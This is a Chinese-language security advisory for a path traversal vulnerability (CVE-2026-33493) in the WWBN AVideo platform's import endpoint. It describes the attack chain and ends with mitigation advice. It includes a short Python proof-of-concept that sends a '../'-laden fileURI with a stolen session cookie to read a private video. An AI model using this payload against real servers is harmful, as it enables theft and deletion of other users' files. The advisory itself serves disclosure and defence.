CVE-2026-33493 CVSS 7.1 高危

CVE-2026-33493: AVideo路径遍历漏洞

披露日期: 2026-03-23

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-33493

漏洞类型

路径遍历

CVSS评分

7.1 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WWBN AVideo

漏洞概述

WWBN AVideo是一个开源视频平台。在26.0及以下版本中，`objects/import.json.php`端点存在安全漏洞。该端点接受用户控制的`fileURI`参数，仅通过正则检查是否以`.mp4`结尾，缺乏必要的目录限制检查。这允许拥有上传权限的认证用户绕过限制，读取任意私有视频文件及相邻的文本文件，甚至删除服务器上的特定文件，导致严重的数据泄露和完整性破坏风险。

技术细节

该漏洞源于`objects/import.json.php`文件对输入参数`fileURI`的验证不严。与经过加固的`listFiles.json.php`不同，后者使用`realpath()`结合目录前缀检查来限制路径必须在`videos/`目录下，而`import.json.php`仅使用正则表达式验证参数是否以`.mp4`结尾。攻击者可以通过在`fileURI`中插入`../`序列进行目录遍历攻击。虽然验证限制了扩展名，但攻击者可以利用该漏洞导入其他用户的私有视频文件到自己的账户（IDOR），或者利用文件操作逻辑读取与视频文件同目录下的`.txt`、`.html`、`.htm`等配置或日志文件。此外，如果Web服务器进程有写权限，攻击者还可以利用此机制删除目标文件，对系统完整性造成影响。

攻击链分析

STEP 1

1. 身份认证

攻击者注册或获取一个具有上传权限的低权限账户。

STEP 2

2. 探测端点

识别`objects/import.json.php`接口，确认其接受`fileURI`参数。

STEP 3

3. 构造恶意载荷

构造包含`../`序列的`fileURI`值，指向目标目录下的`.mp4`文件（或利用该文件读取相邻的`.txt`文件）。

STEP 4

4. 发送攻击请求

向服务器发送POST请求，绕过正则检查。

STEP 5

5. 数据窃取或破坏

服务器将目标文件导入攻击者账户或返回文件内容，若权限允许还可能导致文件被删除。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

target_url = "http://target-site/objects/import.json.php"
# Attacker needs to be authenticated with upload permissions
cookies = {
    "PHPSESSID": "valid_session_id"
}

# Exploit path traversal to steal a private video or read adjacent files
# Note: The endpoint checks if the string ends in .mp4
payload = {
    "fileURI": "../../../var/www/html/AVideo/videos/private/user_secret.mp4"
}

response = requests.post(target_url, data=payload, cookies=cookies)

if response.status_code == 200:
    print("Exploit successful. Response:")
    print(response.text)
else:
    print("Exploit failed.")

影响范围

WWBN AVideo <= 26.0

防御指南

临时缓解措施

建议立即应用官方补丁。如果无法立即升级，应在WAF或Web服务器层面对`objects/import.json.php`接口的`fileURI`参数进行严格过滤，拦截包含`../`、绝对路径或符号链接的请求，并严格限制文件访问范围仅限于用户沙箱目录。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表